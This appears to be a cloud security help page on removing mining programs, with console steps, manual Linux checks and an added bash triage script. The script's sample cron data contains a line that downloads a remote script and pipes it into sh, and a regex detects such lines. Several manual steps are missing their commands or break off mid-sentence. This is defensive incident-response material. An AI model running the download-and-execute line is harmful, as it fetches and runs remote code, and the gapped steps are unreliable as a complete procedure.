This topic uses common mining programs to describe the characteristics of mining programs and explains how Security Center generates alerts on mining programs and blocks, traces, and analyzes them.
Mining programs spread into multiple system services and are therefore difficult to remove completely. They often reappear after removal, and system commands may have been replaced with malicious scripts, so that routine operations unintentionally run malware such as XOR DDoS. Therefore, remove all trojans and persistent webshells from your server while you handle the mining program; otherwise the remaining components reinstall it.
For more information about how to determine whether an asset contains mining programs, see How do I know whether my assets contain mining programs.
Use Security Center to manage mining programs
- Log on to the Security Center console.
- In the left-side navigation pane, choose .
- In the alert list, find the mining program alert in the Event column, and then click Processing in the Actions column. Security Center generates a mining program alert whenever a mining program is detected.
- To remove a mining program, select Virus removal and Isolate the source file of the process, and then click Process Now. This prevents the mining program from running again.
- For other alerts related to the mining program, for example, mining pool communications, select Block. Security Center then generates policies that prevent your servers from connecting to the mining pools. This gives you time to handle the remaining security events.
- Check alerts on unusual process behavior, and determine whether unusual crontab jobs
- Enable virus blocking. If you cannot remove all mining programs from your server, the virus blocking feature blocks the mining programs and prevents them from running. For more information about how to enable virus blocking, see The anti-virus feature.
You can also use Security Center to trace intrusion events and analyze how mining programs intrude into your server.
Use other approaches to manage mining programs
To keep hold of a compromised host for as long as possible, mining programs may plant a large number of webshells on the victim server. In this case, the infection is difficult to remove completely.
Assume that you have not purchased Security Center. To detect and manage mining programs, perform the following steps. The following example is based on the Linux operating system.
- Query the file path of the mining program. xxx is the process ID of the mining program. If the link target is marked (deleted), the binary has already been unlinked and the process keeps running from memory.
ls -l /proc/xxx/exe   # xxx specifies the process ID of the mining program.
- Remove the file of the mining program.
- Among the processes that consume the most CPU resources, find the mining program and terminate it.
- Check whether the firewall rules of your server contain the address of the mining pool to which the mining program connects. Mining programs sometimes add rules that allow their own pool traffic.
- Run the following command to check for unusual communication addresses and open ports that are not required by normal workloads. The command lists the firewall rules; compare them with the active network connections of the server.
iptables -L -n
- Run the following command to remove the address of the mining pool.
- Run the following command to check whether crontab jobs exist.
You can handle suspicious crontab job files based on the check results to prevent repeated intrusions.
- Run the following command to check whether the SSH authorized_keys files contain public keys planted by the mining program.
Removing planted keys closes a persistent backdoor that survives the removal of the mining program itself.
- Check whether mining programs exist on other servers in the same internal network. This eliminates the risk that an infected neighbor reinfects the server you have just cleaned.
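The manual Linux procedure above, gathered into one triage script as an added example. This is not Security Center code and not the original page's commands: the indicator patterns, the private address ranges, the function names and all SAMPLE_* data are assumptions constructed for illustration (198.51.100.7 is a TEST-NET documentation address and the SSH key blobs are fake). The live helpers at the top need root on the suspect host; the remaining functions take command output on stdin or as files, so they can be dry-run offline against the samples.

```shell
#!/usr/bin/env bash
# Added triage helper for manual mining-program cleanup on Linux.
# Not part of Security Center; indicator patterns and SAMPLE_* data are
# constructed assumptions for illustration.

# Processes sorted by CPU usage (live check, run as root).
top_cpu_procs() {
    ps -eo pid=,pcpu=,comm= --sort=-pcpu | head -n "${1:-5}"
}

# Resolve a PID to its binary. readlink prints "<path> (deleted)" when the
# file was already unlinked; an 'i' flag from lsattr means chattr +i was set
# and rm fails until it is cleared.
exe_of_pid() {
    local path
    path=$(readlink "/proc/$1/exe") || return 1
    printf '%s\n' "$path"
    [ -e "$path" ] && lsattr -d -- "$path" 2>/dev/null
    return 0
}

# Clear the immutable bit and unlink the binary before killing, so a watchdog
# cannot re-exec it from disk. Copy the file elsewhere first if you need it
# for analysis.
kill_and_remove() {
    local pid=$1 path
    path=$(readlink "/proc/$pid/exe") || return 1
    path=${path% (deleted)}
    if [ -e "$path" ]; then chattr -i -- "$path" 2>/dev/null; rm -f -- "$path"; fi
    kill -9 "$pid"
}

# Established TCP peers outside loopback and RFC 1918 space, from `ss -tn`
# output on stdin (works with or without the State column).
external_peers() {
    awk 'NR > 1 {
            peer = ""
            for (i = 1; i <= NF; i++) if ($i ~ /:[0-9]+$/) peer = $i
            if (peer == "") next
            host = peer; sub(/:[0-9]+$/, "", host)
            if (host !~ /^(127\.|10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.|\[::1\])/) print peer
         }' | sort -u
}

# `iptables-save` lines (stdin) that reference an address, e.g. a pool the
# mining program added an ACCEPT rule for.
firewall_rules_for() {
    grep -F -- "$1" || true
}

# Cron lines with download-and-execute or hidden-path indicators. Feed it
# `crontab -l`, /etc/crontab, /etc/cron.d/* and /var/spool/cron/*.
flag_cron_lines() {
    grep -v '^[ 	]*#' \
    | grep -E -i '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|/tmp/|/dev/shm/|base64[[:space:]]+(-d|--decode)' \
    || true
}

# Keys in an authorized_keys file ($1) absent from the known-good set your
# provisioning manages ($2). Matches on key type and blob only, so a planted
# key cannot hide behind a copied comment or an options prefix.
unexpected_ssh_keys() {
    awk 'FNR == NR { known[$1 " " $2] = 1; next }
         !/^[ \t]*(#|$)/ {
             i = 1
             while (i <= NF && $i !~ /^(ssh-|ecdsa-|sk-)/) i++
             if (i < NF && !(($i " " $(i + 1)) in known)) print
         }' "$2" "$1"
}

# Constructed sample data for an offline dry run.
SAMPLE_SS='State Recv-Q Send-Q Local Address:Port Peer Address:Port
ESTAB 0 0 10.0.0.5:22 10.0.0.9:51234
ESTAB 0 0 10.0.0.5:43120 198.51.100.7:3333
ESTAB 0 0 127.0.0.1:6379 127.0.0.1:40110'
SAMPLE_IPT='-A OUTPUT -d 198.51.100.7/32 -p tcp --dport 3333 -j ACCEPT
-A INPUT -p tcp --dport 22 -j ACCEPT'
SAMPLE_CRON='# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://198.51.100.7/x.sh | sh
@reboot /dev/shm/.X11/kswapd0'
SAMPLE_KNOWN='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFakeKnownGoodBlob alice@laptop'
SAMPLE_AUTH='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFakeKnownGoodBlob alice@laptop
no-pty,command="/bin/sh" ssh-rsa AAAAB3NzaC1yc2EAAAAFakePlantedBlob alice@laptop
# trailing comment'

# Dry run over the samples; on a suspect host pipe in the live command output.
dry_run() {
    local t; t=$(mktemp -d)
    printf '%s\n' "$SAMPLE_KNOWN" > "$t/known"; printf '%s\n' "$SAMPLE_AUTH" > "$t/auth"
    echo "external peers:";  printf '%s\n' "$SAMPLE_SS"   | external_peers
    echo "firewall rules:";  printf '%s\n' "$SAMPLE_IPT"  | firewall_rules_for 198.51.100.7
    echo "suspicious cron:"; printf '%s\n' "$SAMPLE_CRON" | flag_cron_lines
    echo "unexpected keys:"; unexpected_ssh_keys "$t/auth" "$t/known"
    rm -rf -- "$t"
}
dry_run
```

The dry run reports the pool peer on port 3333, the ACCEPT rule that whitelists it, the two cron entries (download piped into sh, and a binary hidden under /dev/shm) and the planted ssh-rsa key, while the legitimate certbot job and the known ed25519 key pass. Treat the indicator regexes as a starting point: a miner that stages its files under a package directory rather than /tmp will not trip them, so the CPU and network checks remain the primary signal.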